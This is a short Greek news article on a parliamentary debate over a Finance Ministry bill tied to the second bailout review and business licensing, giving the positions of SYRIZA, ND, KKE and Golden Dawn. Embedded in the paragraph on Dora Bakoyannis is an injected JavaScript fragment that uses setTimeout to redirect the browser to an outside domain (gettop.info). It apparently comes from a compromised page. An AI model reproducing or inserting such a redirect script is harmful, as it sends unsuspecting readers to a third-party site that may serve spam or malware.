Συνεχίζεται στην Ολομέλεια η συζήτηση για τα προαπαιτούμενα της β’ αξιολόγησης

0
7

 

Στην Ολομέλεια της Βουλής συνεχίζεται η συζήτηση του νομοσχεδίου του ΥΠΟΙΚ για τα προαπαιτούμενα της β’ αξιολόγησης για την απλούστευση των διαδικασιών αδειοδότησης επιχειρήσεων, ει εισηγήσεις από τα κόμματα.

Υπέρ της αρχής του νομοσχεδίου τάχθηκαν κατά πλειοψηφία οι κομματικές παρατάξεις, με τη ΝΔ να εκφράζει επιφυλάξεις ως προς την εφαρμογή και την αποτελεσματικότητά του, ενώ το ΚΚΕ και η Χρυσή Αυγή δήλωσαν ότι θα καταψηφίσουν, υποστηρίζοντας ότι πρόκειται για νέες αντιλαϊκές μνημονιακές πολιτικές.

Η συζήτηση και ψήφιση του θα ολοκληρωθεί αργά το απόγευμα σε μία συνεδρίαση.

Η εισηγήτρια του ΣΥΡΙΖΑ Θεοδώρα Τζάκρη τόνισε την ανάγκη υπερψήφισης του νομοσχεδίου από όλες τις ευρωπαϊκές δυνάμεις που πιστεύουν, όπως είπε, στις μεταρρυθμίσεις που βάζουν τέλος στις δαιδαλώδεις γραφειοκρατικές διαδικασίες, προασπίζουν το δημόσιο συμφέρον και ενισχύουν την επιχειρηματικότητα και την οικονομία.

Από την πλευρά της ΝΔ η Ντόρα Μπακογιάννη καταλόγισε στην κυβέρνηση αδικαιολόγητες καθυστερήσεις λόγω ιδεοληψιών, όπως είπε, ενώ αμφισβήτησε τόσο την αποτελεσματικότητα όσο και την ευελιξία του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here